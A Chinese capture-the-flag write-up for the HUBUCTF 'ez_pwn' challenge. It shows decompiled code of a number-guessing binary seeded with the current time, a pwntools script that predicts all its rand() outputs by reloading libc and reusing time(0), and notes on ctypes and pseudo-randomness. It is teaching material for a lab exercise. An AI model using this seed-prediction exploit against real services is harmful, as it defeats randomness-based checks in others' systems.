HUBUCTF.新生赛.ez_pwn

ps:本题思路由youlin师傅指引

checksec一下，查看一下保护机制

保护全开 64位？有点被吓到了

不过这种题估计都是flag已经准备好了或者自带shellcode

拖进ida看看

int __cdecl main(int argc, const char **argv, const char **envp)
{
  int v4; // [rsp+4h] [rbp-8Ch] BYREF
  int i; // [rsp+8h] [rbp-88h]
  int v6; // [rsp+Ch] [rbp-84h]
  unsigned int seed[2]; // [rsp+10h] [rbp-80h]
  FILE *stream; // [rsp+18h] [rbp-78h]
  char v9[32]; // [rsp+20h] [rbp-70h] BYREF
  char s[8]; // [rsp+40h] [rbp-50h] BYREF
  __int64 v11; // [rsp+48h] [rbp-48h]
  __int64 v12; // [rsp+50h] [rbp-40h]
  __int64 v13; // [rsp+58h] [rbp-38h]
  __int64 v14; // [rsp+60h] [rbp-30h]
  __int64 v15; // [rsp+68h] [rbp-28h]
  __int64 v16; // [rsp+70h] [rbp-20h]
  __int64 v17; // [rsp+78h] [rbp-18h]
  unsigned __int64 v18; // [rsp+88h] [rbp-8h]

  v18 = __readfsqword(0x28u);
  setvbuf(stdin, 0LL, 2, 0LL);
  setvbuf(stdout, 0LL, 2, 0LL);
  setvbuf(stderr, 0LL, 2, 0LL);
  *(_QWORD *)seed = time(0LL);
  *(_QWORD *)s = 0LL;
  v11 = 0LL;
  v12 = 0LL;
  v13 = 0LL;
  v14 = 0LL;
  v15 = 0LL;
  v16 = 0LL;
  v17 = 0LL;
  puts("Who goes there?");
  gets(v9);
  printf("Welcome to my challenge, %s. No one has ever succeeded before. Will you be the first?\n", v9);
  srand(seed[0]);
  for ( i = 0; i <= 99; ++i )
  {
    v6 = rand() % 100000 + 1;
    puts("I am thinking of a number from 1-100000. What is it?");
    __isoc99_scanf("%d", &v4);
    if ( v6 != v4 )
    {
      puts("You have failed. Goodbye.");
      return 0;
    }
    puts("Impressive.");
  }
  puts("You've guessed all of my numbers. Here is your reward.");
  stream = fopen("flag.txt", "r");
  if ( stream )
  {
    fgets(s, 50, stream);
    puts(s);
  }
  puts("Goodbye.");
  return 0;
}

用时间做了种子，循环一百次，每次都随机一个数，我们需要输对这个数，算是经典的猜数字吧

一开始看到我们可以自定义赋值的v4和随机数v6是相邻的字节，所以想通过溢出来覆盖v6，使得if判断成立，不过貌似不行

所以还是正常做法吧

随机数，我目前知道的两种做法，一种是溢出数据覆盖seed，这样我们在知晓种子的值的情况下，因为c语言的rand是伪随机(下面就要降到了，我知道你很急，但你先别急)，所以就可以知道随机数的值

还有一种办法是本题将要使用到的，这道题我们可以发现他是用当前时间作为种子，来生成随机数，所以我们只要在exp中也是用当前时间作为种子，就可以得到一样的随机数（这里看不懂的话，是伪随机的概念不清楚）

from pwn import *
from ctypes import *
io=remote("1.14.71.254",28056)
libc = cdll.LoadLibrary('/lib/x86_64-linux-gnu/libc.so.6')
seed = libc.time(0)
libc.srand(seed)
io.sendlineafter(b'Who goes there?', b'chen')
for i in range(100):
    buf = libc.rand() % 100000 + 1
    io.sendlineafter(b'What is it?', str(buf))
    io.recvuntil(b'\n')

几个疑点

1.cdll.LoadLibrary的用法：

看了很多篇猜数字的题解啊，竟然没有一个人对这个函数用法有解释，那没办法了，只能自己wiki了

这个函数就是在python中重新加载文件库

还是有限制的：在64位的windows系统中，一个64位进程不能加载一个32位dll，同理一个32位进程也不能加载一个64位dll。

查资料的时候还看到这个限制的特殊情况，不过看不明白，估计了解的价值也不大，先丢在这，有空来填这个坑，感兴趣的可以自己先看(3条消息) python 调用 C++ dll 32位 64位 问题 ctypes.cdll.LoadLibrary_wowocpp的博客-CSDN博客_python调用32位dll

还有一种更深的用法是这个代码库将允许原生Linux程序从一个WindowsDLL文件中加载或调用功能函数

(3条消息) linux运行dll文件命令,LoadLibrary：一款能够允许Linux程序从DLL文件中加载或调用函数的工具…_七分醉玲珑的博客-CSDN博客

因为涉及到linux和windows的进程间通信和内核相关知识，我自己也还没有搞懂，留个坑吧，看以后有没有时间填上

2.伪随机

这里介绍一下c语言中的伪随机

一些基础的c语言知识这里就不多解释了，比如说srand用法和种子的概念

先看看一段代码吧

int main()
{
   for(int i=0; i<10; i++)
      {
        printf("%4d",rand());
      }
   printf("\n");
   return 0;
}

输出10个随机数，我们两次运行试试

生成的随机数都一样？

我们不妨这么理解，所谓的rand函数就是根据每个种子分配一张表格，所谓的随机数是从这个表格调用的，所以当我们第二次运行时，由于种子没改变，那么这张表格的数据也不会改变

那么我们如何获得真正意义上的随机数？想一下有什么东西的数据是一直在变化的

我们把目光瞄向时间，函数srand( (unsigned)time( NULL ) ) 中time返回的是1970年1月1日0点到现在时间流失的秒数值

因此，我们这下没法得知种子是多少，也就无法知道这个种子对应的随机数表是什么

但是我们重加载了libc库，同步获取了time返回的种子值，由于time是以秒作为单位的，我们每次for循环得出的随机数和题目的随机数几乎没有差距，所以这道题的随机数就呼之欲出了